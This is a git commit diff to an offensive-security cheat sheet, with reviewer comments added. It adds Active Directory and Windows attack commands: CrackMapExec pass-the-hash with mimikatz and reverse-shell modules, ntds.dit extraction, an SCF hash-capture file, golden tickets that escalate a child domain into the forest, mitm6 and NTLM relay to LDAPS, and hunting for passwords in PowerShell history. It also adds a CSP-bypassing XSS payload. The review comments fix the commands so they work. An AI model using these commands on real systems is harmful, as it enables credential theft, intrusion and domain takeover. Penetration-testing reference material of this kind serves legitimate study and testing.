SID history break trust + Powershell history + SCF files
This commit is contained in:
parent
6fecedd880
commit
f6d5221a85
@ -26,10 +26,13 @@
|
|||||||
* [MS08-068 NTLM reflection](#ms08-068-ntlm-reflection)
|
* [MS08-068 NTLM reflection](#ms08-068-ntlm-reflection)
|
||||||
* [SMB Signing Disabled](#smb-signing-disabled)
|
* [SMB Signing Disabled](#smb-signing-disabled)
|
||||||
* [Drop the MIC](#drop-the-mic)
|
* [Drop the MIC](#drop-the-mic)
|
||||||
|
* [SCF file attack against writeable share](#scf-file-attack-against-writeable-share)
|
||||||
* [Dangerous Built-in Groups Usage](#dangerous-built-in-groups-usage)
|
* [Dangerous Built-in Groups Usage](#dangerous-built-in-groups-usage)
|
||||||
* [Trust relationship between domains](#trust-relationship-between-domains)
|
* [Trust relationship between domains](#trust-relationship-between-domains)
|
||||||
|
* [Child Domain to Forest Compromise - SID Hijacking](#child-domain-to-forest-compromise---sid-hijacking)
|
||||||
* [Unconstrained delegation](#unconstrained-delegation)
|
* [Unconstrained delegation](#unconstrained-delegation)
|
||||||
* [Resource-Based Constrained Delegation](#resource-based-constrained-delegation)
|
* [Resource-Based Constrained Delegation](#resource-based-constrained-delegation)
|
||||||
|
* [Relay delegation with mitm6](#relay-delegation-with-mitm6)
|
||||||
* [PrivExchange attack](#privexchange-attack)
|
* [PrivExchange attack](#privexchange-attack)
|
||||||
* [Password spraying](#password-spraying)
|
* [Password spraying](#password-spraying)
|
||||||
* [Extract accounts from /etc/krb5.keytab](#extract-accounts-from-etc-krb5-keytab)
|
* [Extract accounts from /etc/krb5.keytab](#extract-accounts-from-etc-krb5-keytab)
|
||||||
@ -64,13 +67,14 @@
|
|||||||
git clone --recursive https://github.com/byt3bl33d3r/CrackMapExec
|
git clone --recursive https://github.com/byt3bl33d3r/CrackMapExec
|
||||||
crackmapexec smb -L
|
crackmapexec smb -L
|
||||||
crackmapexec smb -M name_module -o VAR=DATA
|
crackmapexec smb -M name_module -o VAR=DATA
|
||||||
crackmapexec 192.168.1.100 -u Jaddmon -H 5858d47a41e40b40f294b3100bea611f --local-auth
|
crackmapexec 192.168.1.100 -u Administrator -H 5858d47a41e40b40f294b3100bea611f --local-auth
|
||||||
crackmapexec 192.168.1.100 -u Jaddmon -H 5858d47a41e40b40f294b3100bea611f --shares
|
crackmapexec 192.168.1.100 -u Administrator -H 5858d47a41e40b40f294b3100bea611f --shares
|
||||||
crackmapexec 192.168.1.100 -u Jaddmon -H ':5858d47a41e40b40f294b3100bea611f' -d 'DOMAIN' -M invoke_sessiongopher
|
crackmapexec 192.168.1.100 -u Administrator -H ':5858d47a41e40b40f294b3100bea611f' -d 'DOMAIN' -M invoke_sessiongopher
|
||||||
crackmapexec 192.168.1.100 -u Jaddmon -H 5858d47a41e40b40f294b3100bea611f -M rdp -o ACTION=enable
|
crackmapexec 192.168.1.100 -u Administrator -H 5858d47a41e40b40f294b3100bea611f -M rdp -o ACTION=enable
|
||||||
crackmapexec 192.168.1.100 -u Jaddmon -H 5858d47a41e40b40f294b3100bea611f -M metinject -o LHOST=192.168.1.63 LPORT=4443
|
crackmapexec 192.168.1.100 -u Administrator -H 5858d47a41e40b40f294b3100bea611f -M metinject -o LHOST=192.168.1.63 LPORT=4443
|
||||||
crackmapexec 192.168.1.100 -u Jaddmon -H ":5858d47a41e40b40f294b3100bea611f" -M web_delivery -o URL="https://IP:PORT/posh-payload"
|
crackmapexec 192.168.1.100 -u Administrator -H ":5858d47a41e40b40f294b3100bea611f" -M web_delivery -o URL="https://IP:PORT/posh-payload"
|
||||||
crackmapexec 192.168.1.100 -u Jaddmon -H ":5858d47a41e40b40f294b3100bea611f" --exec-method smbexec -X 'whoami'
|
crackmapexec 192.168.1.100 -u Administrator -H ":5858d47a41e40b40f294b3100bea611f" --exec-method smbexec -X 'whoami'
|
||||||
|
crackmapexec smb 10.10.14.0/24 -u user -p 'Password' --local-auth -M mimikatz
|
||||||
crackmapexec mimikatz --server http --server-port 80
|
crackmapexec mimikatz --server http --server-port 80
|
||||||
```
|
```
|
||||||
|
|
||||||
@ -365,6 +369,14 @@ dir c:\exfil
|
|||||||
reg.exe save hklm\system c:\exfil\system.bak
|
reg.exe save hklm\system c:\exfil\system.bak
|
||||||
```
|
```
|
||||||
|
|
||||||
|
#### Using esentutl.exe
|
||||||
|
|
||||||
|
Copy/extract a locked file such as the AD Database
|
||||||
|
|
||||||
|
```powershell
|
||||||
|
esentutl.exe /y /vss c:\windows\ntds\ntds.dit /d c:\folder\ntds.dit
|
||||||
|
```
|
||||||
|
|
||||||
#### Extract hashes from ntds.dit
|
#### Extract hashes from ntds.dit
|
||||||
|
|
||||||
then you need to use secretsdump to extract the hashes
|
then you need to use secretsdump to extract the hashes
|
||||||
@ -557,6 +569,9 @@ Mitigations:
|
|||||||
|
|
||||||
If a domain user does not have Kerberos preauthentication enabled, an AS-REP can be successfully requested for the user, and a component of the structure can be cracked offline a la kerberoasting
|
If a domain user does not have Kerberos preauthentication enabled, an AS-REP can be successfully requested for the user, and a component of the structure can be cracked offline a la kerberoasting
|
||||||
|
|
||||||
|
Prerequisite:
|
||||||
|
- Accounts have to have **DONT_REQ_PREAUTH**
|
||||||
|
|
||||||
```powershell
|
```powershell
|
||||||
C:\>git clone https://github.com/GhostPack/Rubeus#asreproast
|
C:\>git clone https://github.com/GhostPack/Rubeus#asreproast
|
||||||
C:\Rubeus>Rubeus.exe asreproast /user:TestOU3user /format:hashcat /outfile:hashes.asreproast
|
C:\Rubeus>Rubeus.exe asreproast /user:TestOU3user /format:hashcat /outfile:hashes.asreproast
|
||||||
@ -766,6 +781,19 @@ python2 scanMIC.py 'DOMAIN/USERNAME:PASSWORD@TARGET'
|
|||||||
secretsdump.py -k -no-pass second-dc-server.local -just-dc
|
secretsdump.py -k -no-pass second-dc-server.local -just-dc
|
||||||
```
|
```
|
||||||
|
|
||||||
|
|
||||||
|
### SCF file attack against writeable share
|
||||||
|
|
||||||
|
Drop the following `something.scf` file inside a share and start listening with Responder : `responder -wrf --lm -v -I eth0`
|
||||||
|
|
||||||
|
```powershell
|
||||||
|
[Shell]
|
||||||
|
Command=2
|
||||||
|
IconFile=\\10.10.XX.XX\Share\test.ico
|
||||||
|
[Taskbar]
|
||||||
|
Command=ToggleDesktop
|
||||||
|
```
|
||||||
|
|
||||||
### Dangerous Built-in Groups Usage
|
### Dangerous Built-in Groups Usage
|
||||||
|
|
||||||
If you do not want modified ACLs to be overwrite every hour, you should change ACL template on the object CN=AdminSDHolder,CN=System, " or set "adminCount" attribute to 0 for the required objec
|
If you do not want modified ACLs to be overwrite every hour, you should change ACL template on the object CN=AdminSDHolder,CN=System, " or set "adminCount" attribute to 0 for the required objec
|
||||||
@ -795,6 +823,25 @@ SourceName TargetName TrustType TrustDirection
|
|||||||
domainA.local domainB.local TreeRoot Bidirectional
|
domainA.local domainB.local TreeRoot Bidirectional
|
||||||
```
|
```
|
||||||
|
|
||||||
|
### Child Domain to Forest Compromise - SID Hijacking
|
||||||
|
|
||||||
|
Most trees are linked with dual sided trust relationships to allow for sharing of resources.
|
||||||
|
By default the first domain created if the Forest Root.
|
||||||
|
|
||||||
|
Prerequisite:
|
||||||
|
- KRBTGT Hash
|
||||||
|
|
||||||
|
- Find the SID of the domain
|
||||||
|
```powershell
|
||||||
|
$ Convert-NameToSid target.domain.com\krbtgt
|
||||||
|
S-1-5-21-2941561648-383941485-1389968811-502
|
||||||
|
```
|
||||||
|
- Replace 502 with 519 to represent Enterprise Admins
|
||||||
|
- Create golden ticket and attack parent domain.
|
||||||
|
```powershell
|
||||||
|
kerberos::golden /user:Administrator /krbtgt:HASH_KRBTGT /domain:domain.local /sid:S-1-5-21-2941561648-383941485-1389968811 /sids:S-1-5-SID-SECOND-DOMAIN-519 /ptt
|
||||||
|
```
|
||||||
|
|
||||||
### Unconstrained delegation
|
### Unconstrained delegation
|
||||||
|
|
||||||
> The user sends a TGS to access the service, along with their TGT, and then the service can use the user’s TGT to request a TGS for the user to any other service and impersonate the user. - https://shenaniganslabs.io/2019/01/28/Wagging-the-Dog.html
|
> The user sends a TGS to access the service, along with their TGT, and then the service can use the user’s TGT to request a TGS for the user to any other service and impersonate the user. - https://shenaniganslabs.io/2019/01/28/Wagging-the-Dog.html
|
||||||
@ -930,6 +977,23 @@ Resource-based Constrained Delegation was introduced in Windows Server 2012.
|
|||||||
[+] Ticket successfully imported!
|
[+] Ticket successfully imported!
|
||||||
```
|
```
|
||||||
|
|
||||||
|
### Relay delegation with mitm6
|
||||||
|
|
||||||
|
Prerequisites:
|
||||||
|
- IPv6 enabled (Windows prefers IPV6 over IPv4)
|
||||||
|
- LDAP over TLS (LDAPS)
|
||||||
|
|
||||||
|
> ntlmrelayx relays the captured credentials to LDAP on the domain controller, uses that to create a new machine account, print the account's name and password and modifies the delegation rights of it.
|
||||||
|
|
||||||
|
```powershell
|
||||||
|
git clone https://github.com/fox-it/mitm6.git
|
||||||
|
cd /opt/tools/mitm6
|
||||||
|
pip install .
|
||||||
|
|
||||||
|
mitm6 -hw ws02 -d lab.local --ignore-nofqnd
|
||||||
|
ntlmrelayx.py -t ldaps://dc01.lab.local --delegate-access --no-smb-server -wh attacker-wpad
|
||||||
|
then use rubeus with s4u to relay the delegation
|
||||||
|
```
|
||||||
|
|
||||||
### PrivExchange attack
|
### PrivExchange attack
|
||||||
|
|
||||||
@ -979,6 +1043,14 @@ Alternatively you can use the Metasploit module
|
|||||||
|
|
||||||
[`use auxiliary/scanner/http/exchange_web_server_pushsubscription`](https://github.com/rapid7/metasploit-framework/pull/11420)
|
[`use auxiliary/scanner/http/exchange_web_server_pushsubscription`](https://github.com/rapid7/metasploit-framework/pull/11420)
|
||||||
|
|
||||||
|
Alternatively you can use an all-in-one tool : Exchange2domain.
|
||||||
|
|
||||||
|
```powershell
|
||||||
|
git clone github.com/Ridter/Exchange2domain
|
||||||
|
python Exchange2domain.py -ah attackterip -ap listenport -u user -p password -d domain.com -th DCip MailServerip
|
||||||
|
python Exchange2domain.py -ah attackterip -u user -p password -d domain.com -th DCip --just-dc-user krbtgt MailServerip
|
||||||
|
```
|
||||||
|
|
||||||
### Password spraying
|
### Password spraying
|
||||||
|
|
||||||
Password spraying refers to the attack method that takes a large number of usernames and loops them with a single password.
|
Password spraying refers to the attack method that takes a large number of usernames and loops them with a single password.
|
||||||
@ -1189,4 +1261,5 @@ Navigate to any web application that is integrated with our AAD domain. Once at
|
|||||||
* [Playing with Relayed Credentials - June 27, 2018](https://www.secureauth.com/blog/playing-relayed-credentials)
|
* [Playing with Relayed Credentials - June 27, 2018](https://www.secureauth.com/blog/playing-relayed-credentials)
|
||||||
* [Exploiting CVE-2019-1040 - Combining relay vulnerabilities for RCE and Domain Admin - Dirk-jan Mollema](https://dirkjanm.io/exploiting-CVE-2019-1040-relay-vulnerabilities-for-rce-and-domain-admin/)
|
* [Exploiting CVE-2019-1040 - Combining relay vulnerabilities for RCE and Domain Admin - Dirk-jan Mollema](https://dirkjanm.io/exploiting-CVE-2019-1040-relay-vulnerabilities-for-rce-and-domain-admin/)
|
||||||
* [Drop the MIC - CVE-2019-1040 - Marina Simakov - Jun 11, 2019](https://blog.preempt.com/drop-the-mic)
|
* [Drop the MIC - CVE-2019-1040 - Marina Simakov - Jun 11, 2019](https://blog.preempt.com/drop-the-mic)
|
||||||
* [How to build a SQL Server Virtual Lab with AutomatedLab in Hyper-V - October 30, 2017 - Craig Porteous](https://www.sqlshack.com/build-sql-server-virtual-lab-automatedlab-hyper-v/)
|
* [How to build a SQL Server Virtual Lab with AutomatedLab in Hyper-V - October 30, 2017 - Craig Porteous](https:/www.sqlshack.com/build-sql-server-virtual-lab-automatedlab-hyper-v/)
|
||||||
|
* [SMB Share – SCF File Attacks - December 13, 2017 - @netbiosX](pentestlab.blog/2017/12/13/smb-share-scf-file-attacks/)
|
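Review bot: The mitm6 command in the `Relay delegation with mitm6` hunk fails as written, because the option is spelled `--ignore-nofqdn` in mitm6 and `--ignore-nofqnd` is rejected as an unrecognized argument; the line should read `mitm6 -hw ws02 -d lab.local --ignore-nofqdn`. The prerequisite list also omits the two conditions the quoted ntlmrelayx behaviour actually depends on: creating a machine account requires `ms-DS-MachineAccountQuota` to be greater than 0 (the default is 10), and the LDAPS relay is blocked when the domain controller enforces LDAP channel binding, so I would add `- ms-DS-MachineAccountQuota > 0 (default: 10)` and `- LDAP channel binding (EPA) not enforced on the DC` under `Prerequisites:`. Finally, `then use rubeus with s4u to relay the delegation` sits inside the powershell fence as if it were a command; it should move below the closing fence as prose, and "relay" is misleading there since S4U impersonates a user through the new account's delegation right, e.g. `Rubeus.exe s4u /user:<newmachine$> /rc4:<nthash> /impersonateuser:administrator /msdsspn:cifs/ws02.lab.local /ptt`.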
@ -7,6 +7,14 @@
|
|||||||
* [User Enumeration](#user-enumeration)
|
* [User Enumeration](#user-enumeration)
|
||||||
* [Network Enumeration](#network-enumeration)
|
* [Network Enumeration](#network-enumeration)
|
||||||
* [EoP - Looting for passwords](#eop---looting-for-passwords)
|
* [EoP - Looting for passwords](#eop---looting-for-passwords)
|
||||||
|
* [SAM and SYSTEM files](#sam-and-system-files)
|
||||||
|
* [Search for file contents](#search-for-file-contents)
|
||||||
|
* [Search for a file with a certain filename](#search-for-a-file-with-a-certain-filename)
|
||||||
|
* [Search the registry for key names and passwords](#search-the-registry-for-key-names-and-passwords)
|
||||||
|
* [Passwords in unattend.xml](#passwords-in-unattend.xml)
|
||||||
|
* [Wifi passwords](#wifi-passwords)
|
||||||
|
* [Passwords stored in services](#passwords-stored-in-services)
|
||||||
|
* [Powershell history](#powershell-history)
|
||||||
* [EoP - Processes Enumeration and Tasks](#eop---processes-enumeration-and-tasks)
|
* [EoP - Processes Enumeration and Tasks](#eop---processes-enumeration-and-tasks)
|
||||||
* [EoP - Incorrect permissions in services](#eop---incorrect-permissions-in-services)
|
* [EoP - Incorrect permissions in services](#eop---incorrect-permissions-in-services)
|
||||||
* [EoP - Windows Subsystem for Linux (WSL)](#eop---windows-subsystem-for-linux-wsl)
|
* [EoP - Windows Subsystem for Linux (WSL)](#eop---windows-subsystem-for-linux-wsl)
|
||||||
@ -381,6 +389,13 @@ Invoke-SessionGopher -AllDomain -o
|
|||||||
Invoke-SessionGopher -AllDomain -u domain.com\adm-arvanaghi -p s3cr3tP@ss
|
Invoke-SessionGopher -AllDomain -u domain.com\adm-arvanaghi -p s3cr3tP@ss
|
||||||
```
|
```
|
||||||
|
|
||||||
|
### Powershell history
|
||||||
|
|
||||||
|
```powershell
|
||||||
|
type C:\Users\swissky\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt
|
||||||
|
cat (Get-PSReadlineOption).HistorySavePath
|
||||||
|
cat (Get-PSReadlineOption).HistorySavePath | sls passw
|
||||||
|
```
|
||||||
|
|
||||||
## EoP - Processes Enumeration and Tasks
|
## EoP - Processes Enumeration and Tasks
|
||||||
|
|
||||||
|
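Review bot: The `Powershell history` hunk only ever reads the current user's history, since `(Get-PSReadlineOption).HistorySavePath` resolves to the caller's own profile and the first line hard-codes `C:\Users\swissky`, so in a privilege-escalation context the files that matter — other users' and administrators' histories — are never looked at. I would replace the hard-coded path with a sweep across all profiles, `Get-ChildItem C:\Users\*\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt -ErrorAction SilentlyContinue | ForEach-Object { Get-Content $_.FullName }`, which silently skips profiles the current account cannot read. A one-line caveat above the fence is also worth adding, `# PSReadLine writes this file only for interactive sessions (PowerShell 5+); it is absent or empty if HistorySaveStyle was set to SaveNothing`, so a missing file is not mistaken for evidence that nothing was run.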
@ -169,6 +169,7 @@ Then log in using xfreerdp
|
|||||||
|
|
||||||
```powershell
|
```powershell
|
||||||
xfreerdp /u:offsec /d:win2012 /pth:88a405e17c0aa5debbc9b5679753939d /v:10.0.0.1 # pass the hash works for Server 2012 R2 / Win 8.1+
|
xfreerdp /u:offsec /d:win2012 /pth:88a405e17c0aa5debbc9b5679753939d /v:10.0.0.1 # pass the hash works for Server 2012 R2 / Win 8.1+
|
||||||
|
xfreerdp -u test -p 36374BD2767773A2DD4F6B010EC5EE0D 192.168.226.129 # pass the hash using Restricted Admin, need an admin account not in the "Remote Desktop Users" group.
|
||||||
xfreerd /u:runner /v:10.0.0.1 # password will be asked
|
xfreerd /u:runner /v:10.0.0.1 # password will be asked
|
||||||
```
|
```
|
||||||
|
|
||||||
|
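Review bot: The added `xfreerdp -u test -p 36374BD2767773A2DD4F6B010EC5EE0D 192.168.226.129` line does not pass the hash: in the legacy single-dash syntax `-p` is the plaintext password, so the NT hash is sent as a password and the logon fails, whereas the hash is only accepted through `/pth:` in the slash syntax already used on the line above, i.e. `xfreerdp /u:test /pth:36374BD2767773A2DD4F6B010EC5EE0D /v:192.168.226.129`. The trailing comment also states the wrong prerequisite, as far as I can tell: `/pth` relies on Restricted Admin mode, which is off by default and has to be enabled on the target (`DisableRestrictedAdmin` = 0 under `HKLM\SYSTEM\CurrentControlSet\Control\Lsa`), and the account needs local administrator rights on that host, so membership in `Remote Desktop Users` is not what decides it; I would rewrite the comment as `# pass the hash via Restricted Admin mode: target needs DisableRestrictedAdmin=0 and the account must be a local admin there`. The context line `xfreerd /u:runner /v:10.0.0.1` is missing the final `p` of the binary name, although that predates this commit.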
@ -932,6 +932,15 @@ Works for CSP like `script-src self`
|
|||||||
<object data="data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg=="></object>
|
<object data="data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg=="></object>
|
||||||
```
|
```
|
||||||
|
|
||||||
|
### Bypass CSP by [@404death](https://twitter.com/404death/status/1191222237782659072)
|
||||||
|
|
||||||
|
Works for CSP like `script-src 'self' data:`
|
||||||
|
|
||||||
|
```javascript
|
||||||
|
<script ?/src="data:+,\u0061lert%281%29">/</script>
|
||||||
|
```
|
||||||
|
|
||||||
|
|
||||||
## Common WAF Bypass
|
## Common WAF Bypass
|
||||||
|
|
||||||
### Cloudflare XSS Bypasses by [@Bohdan Korzhynskyi](https://twitter.com/h1_ragnar) - 3rd june 2019
|
### Cloudflare XSS Bypasses by [@Bohdan Korzhynskyi](https://twitter.com/h1_ragnar) - 3rd june 2019
|
||||||
|
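Review bot: The description `Works for CSP like script-src 'self' data:` in the `Bypass CSP by @404death` hunk attributes the bypass to the wrong thing: the `'self'` plays no part, because any `data:` scheme in `script-src` already allows `<script src="data:,alert(1)"></script>`, so the `?/` attribute-name quirk and the `\u0061`/`%28` encoding only evade WAFs or naive filters, not the policy. I would make that explicit, e.g. `Works for CSP like script-src 'self' data: — any data: in script-src is enough on its own; the obfuscation below is for filter evasion`, so readers identify `data:` as the misconfiguration to report. The fence is also tagged `javascript` while the content is an HTML element; `html` is the right tag for `<script ?/src="data:+,\u0061lert%281%29">/</script>`.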